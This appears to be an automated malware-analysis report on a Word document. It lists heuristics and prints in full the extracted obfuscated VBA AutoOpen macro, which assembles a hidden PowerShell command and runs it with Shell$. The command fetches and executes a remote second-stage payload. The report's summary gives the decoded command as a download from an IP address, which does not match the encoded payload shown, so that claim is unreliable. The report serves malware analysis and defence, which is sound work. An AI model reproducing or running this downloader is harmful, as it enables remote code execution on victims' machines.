MALICIOUS
110
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains a VBA macro with an AutoOpen function that is designed to execute a command. This command decodes a Base64 string which, when executed, downloads and runs a PowerShell script from a remote URL. The script itself is obfuscated, but the decoded command appears to be 'powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://185.189.255.133/a.txt')"', indicating a downloader for a second-stage payload.
Heuristics 5
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
GM_SA = GM_SA + AM_OJ Shell$ GM_SA End Sub -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "genial" Sub AutoOpen() Dim GM_SA As String -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5899 bytes |
SHA-256: ff0f1ce6e6f3ed34ee96e0c53bfdff71b78be3cf6bf2b824dd8c44ab02f897f1 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "genial"
Sub AutoOpen()
Dim GM_SA As String
DQ_MB = Array("i", "b", "l", "p", "d", "-", "x", "a", "e", "n", "u", "w", "o", "y", "s", "r", " ", "t", "h", "c")
Dim HR_LA As String
HR_LA = "ZgB1AG4AYwB0AGkAbwBuACAA"
GM_SA = GM_SA + DQ_MB(3)
GM_SA = GM_SA + DQ_MB(12)
Dim CL_SE As String
CL_SE = "YQAoACQAeAApAHsA"
GM_SA = GM_SA + DQ_MB(11)
GM_SA = GM_SA + DQ_MB(8)
Dim BM_PD As String
BM_PD = "cgBlAHQAdQByAG4AIABbAF"
GM_SA = GM_SA + DQ_MB(15)
GM_SA = GM_SA + DQ_MB(14)
Dim GR_OH As String
GR_OH = "MAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4"
GM_SA = GM_SA + DQ_MB(18)
GM_SA = GM_SA + DQ_MB(8)
Dim BP_KE As String
BP_KE = "AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0"
AM_OJ = AM_OJ & HR_LA & CL_SE & BM_PD & GR_OH & BP_KE
GM_SA = GM_SA + DQ_MB(2)
GM_SA = GM_SA + DQ_MB(2)
Dim HO_RB As String
HO_RB = "AHIAaQB"
GM_SA = GM_SA + DQ_MB(16)
GM_SA = GM_SA + DQ_MB(5)
Dim JS_TE As String
JS_TE = "uAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBl"
GM_SA = GM_SA + DQ_MB(11)
GM_SA = GM_SA + DQ_MB(0)
Dim ER_ND As String
ER_ND = "AHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA"
GM_SA = GM_SA + DQ_MB(9)
GM_SA = GM_SA + DQ_MB(4)
Dim GM_NF As String
GM_NF = "0AFMAdAByAGkAbgBnACgAJAB4ACkAKQB9ADsAaQBlAHg"
GM_SA = GM_SA + DQ_MB(12)
GM_SA = GM_SA + DQ_MB(11)
Dim DM_RA As String
DM_RA = "AIAAkACgAYQAgACQA"
AM_OJ = AM_OJ & HO_RB & JS_TE & ER_ND & GM_NF & DM_RA
GM_SA = GM_SA + DQ_MB(14)
GM_SA = GM_SA + DQ_MB(17)
Dim JO_PD As String
JO_PD = "KAAkACgAJAAoAGkAbgB2AG8AawBlAC0A"
GM_SA = GM_SA + DQ_MB(13)
GM_SA = GM_SA + DQ_MB(2)
Dim GO_NJ As String
GO_NJ = "dwBlAGIAcgBlAHEAdQBlAHMAd"
GM_SA = GM_SA + DQ_MB(8)
GM_SA = GM_SA + DQ_MB(16)
Dim JL_RA As String
JL_RA = "AAgACcAaAB0AHQAcABzADoALwAvAHUAcwBwAHIAZAA1"
GM_SA = GM_SA + DQ_MB(18)
GM_SA = GM_SA + DQ_MB(0)
Dim FO_RF As String
FO_RF = "ADEANQAwAGMAZQBuAHQAcgBhAGwALgB0AGEAYgBsAGUALgBjAG"
GM_SA = GM_SA + DQ_MB(4)
GM_SA = GM_SA + DQ_MB(4)
Dim DK_OE As String
DK_OE = "8AcgBlAC4AdwBpAG4AZABvAHcAcwAuAG4AZQB0AC8AdwBhA"
AM_OJ = AM_OJ & JO_PD & GO_NJ & JL_RA & FO_RF & DK_OE
GM_SA = GM_SA + DQ_MB(8)
GM_SA = GM_SA + DQ_MB(9)
Dim HL_RI As String
HL_RI = "HIAZQBoAG8AdQBzAGUAPwAkA"
GM_SA = GM_SA + DQ_MB(16)
GM_SA = GM_SA + DQ_MB(5)
Dim IL_LJ As String
IL_LJ = "GYAaQBsAHQAZQ"
GM_SA = GM_SA + DQ_MB(8)
GM_SA = GM_SA + DQ_MB(6)
Dim HQ_LA As String
HQ_LA = "ByAD0AUABhAHIAdABpAHQAaQBvAG4ASwBlAHk"
GM_SA = GM_SA + DQ_MB(8)
GM_SA = GM_SA + DQ_MB(19)
Dim GL_KD As String
GL_KD = "AJQAyADAAZQBx"
GM_SA = GM_SA + DQ_MB(10)
GM_SA = GM_SA + DQ_MB(17)
Dim JR_QG As String
JR_QG = "ACUAMgAwACUAMgA3AHMAdABhAGcAZQAlADIANwAmACQA"
AM_OJ = AM_OJ & HL_RI & IL_LJ & HQ_LA & GL_KD & JR_QG
GM_SA = GM_SA + DQ_MB(0)
GM_SA = GM_SA + DQ_MB(12)
Dim JP_SB As String
JP_SB = "UwBlAGwAZQBjAHQAPQBkAGE"
GM_SA = GM_SA + DQ_MB(9)
GM_SA = GM_SA + DQ_MB(3)
Dim AR_PI As String
AR_PI = "AdABhACYAcwB2AD0AMgAwADEANwA"
GM_SA = GM_SA + DQ_MB(12)
GM_SA = GM_SA + DQ_MB(2)
Dim BQ_RD As String
BQ_RD = "tADAANAAtADEANwAmAHMAcwA9AG"
GM_SA = GM_SA + DQ_MB(0)
GM_SA = GM_SA + DQ_MB(19)
Dim FQ_RG As String
FQ_RG = "IAZgBxAH"
GM_SA = GM_SA + DQ_MB(13)
GM_SA = GM_SA + DQ_MB(16)
Dim AP_KG As String
AP_KG = "QAJgBzAHIAdAA9AHMAYwBvACYAcwBwAD0AcgB3AGQAbABh"
AM_OJ = AM_OJ & JP_SB & AR_PI & BQ_RD & FQ_RG & AP_KG
GM_SA = GM_SA + DQ_MB(1)
GM_SA = GM_SA + DQ_MB(13)
Dim BO_MF As String
BO_MF = "AGMAdQBwACYAcwBlAD0AMgAwAD"
GM_SA = GM_SA + DQ_MB(3)
GM_SA = GM_SA + DQ_MB(7)
Dim EL_RH As String
EL_RH = "EANwAtADEAMA"
GM_SA = GM_SA + DQ_MB(14)
GM_SA = GM_SA + DQ_MB(14)
Dim IP_RE As String
IP_RE = "AtADAANgBUADIAMgA6ADQAMQA6ADEAMgBaACYAcwB0AD0A"
GM_SA = GM_SA + DQ_MB(16)
GM_SA = GM_SA + DQ_MB(5)
Dim BT_PG As String
BT_PG = "MgAwADEANwAtADAAOQAtADIAOABUADEANAA6ADQAMQA"
GM_SA = GM_SA + DQ_MB(8)
GM_SA = GM_SA + DQ_MB(16)
Dim IQ_MF As String
IQ_MF = "6ADEAMgBaACYAcwBwAHIAPQBoAHQAdABwAHMAJ"
AM_OJ = AM_OJ & BO_MF & EL_RH & IP_RE & BT_PG & IQ_MF
Dim JP_NF As String
JP_NF = "gBzAGkAZwA9AHQA"
Dim DP_QF As String
DP_QF = "egBQADcAYwA4AHgAWgBoA"
Dim BM_PC As String
BM_PC = "HIAMQBzAGIAdgB4ADkAZgBKAFMAdwB"
Dim EQ_QG As String
EQ_QG = "KAEkAUwBIAEIANgBlADgAJQAyAEIAbgBsAGwAdQBuAEgAa"
Dim BQ_RI As String
BQ_RI = "QBmAEwAMwBoAHgAagA0ACUAMwBEACcAIAAtAEg"
AM_OJ = AM_OJ & JP_NF & DP_QF & BM_PC & EQ_QG & BQ_RI
Dim IN_NE As String
IN_NE = "AZQBhAGQAZQByAHMAIABAAHs"
Dim AP_RB As String
AP_RB = "AJwBBAGMAYwBlAHAAdAAnAD0AJwBBAHAAcAB"
Dim HT_MC As String
HT_MC = "sAGkAYwBhAHQAaQBvAG4ALwBKAFM"
Dim HS_PJ As String
HS_PJ = "ATwBOACcAfQApAC4AQwBvAG4AdA"
Dim AN_LG As String
AN_LG = "BlAG4AdAAgAHwAIABDAG8AbgB2AGUAcgB0AE"
AM_OJ = AM_OJ & IN_NE & AP_RB & HT_MC & HS_PJ & AN_LG
Dim FO_KI As String
FO_KI = "YAcgBvAG0ALQBKA"
AM_OJ = AM_OJ & FO_KI
Dim EQ_LH As String
EQ_LH = "HMAbwBuACkALgB2AGEAbAB1AGUALgBkAGEAdABhACkAKQ"
AM_OJ = AM_OJ & EQ_LH
Dim IQ_MD As String
IQ_MD = "A="
AM_OJ = AM_OJ & IQ_MD
GM_SA = GM_SA + AM_OJ
Shell$ GM_SA
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.